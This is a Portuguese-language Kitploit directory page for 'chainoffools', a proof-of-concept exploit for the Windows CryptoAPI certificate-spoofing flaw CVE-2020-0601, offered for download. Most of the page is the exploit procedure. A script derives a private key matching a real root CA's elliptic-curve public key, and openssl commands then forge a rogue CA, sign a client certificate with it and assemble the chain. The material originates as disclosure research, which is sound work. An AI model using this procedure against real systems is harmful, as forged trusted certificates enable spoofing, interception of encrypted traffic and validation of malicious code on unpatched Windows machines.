Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
chainoffools — Exploit de prova de conceito para a vulnerabilidade de falsificação do Windows CryptoAPI CVE-2020-0601, demonstrando a geração de certificado de CA malicioso usando manipulação de chaves de curva elíptica. | Kitploit
Ferramentas/GitHubGitHub/kudelskisecurity/chainoffools
Análise de VulnerabilidadesAnálise de CódigoExploraçãoCriptografiaTestes de Penetração
GitHubkudelskisecurity/chainoffools

chainoffools

Exploit de prova de conceito para a vulnerabilidade de falsificação do Windows CryptoAPI CVE-2020-0601, demonstrando a geração de certificado de CA malicioso usando manipulação de chaves de curva elíptica.

Ver Repositório
335813há 3 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CryptoAPI

CVE-2020-0601: Exploração da vulnerabilidade de falsificação do Windows CryptoAPI. Mais informações em nosso post no blog.

Instalar requisitos

root@kitploit:~
pip install -U -r requirements.txt

A geração de certificados funciona com a versão do OpenSSL até 1.0.2u.

Certificado CA

Usamos a USERTrust ECC Certification Authority mas pode ser qualquer certificado raiz funcionando na curva P-384.

Para gerar uma chave privada que corresponda à chave pública do certificado raiz usamos o script gen-key.py (funciona com Python 3.6 e superior):

root@kitploit:~
$ ./gen-key.py RootCert.pem 

A chave pode ser exibida com:

root@kitploit:~
$ openssl ec -in p384-key-rogue.pem -text

Em seguida, para gerar o CA fraudulento:

root@kitploit:~
$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500

Então geramos a seguinte chave privada e certificado:

root@kitploit:~
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem

openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr

openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf 

Finalmente, para ter a cadeia completa em um único arquivo, concatenamos o CA e os certificados do servidor:

root@kitploit:~
cat client-cert.pem ca-rogue.pem > cert.pem
Baixar ferramenta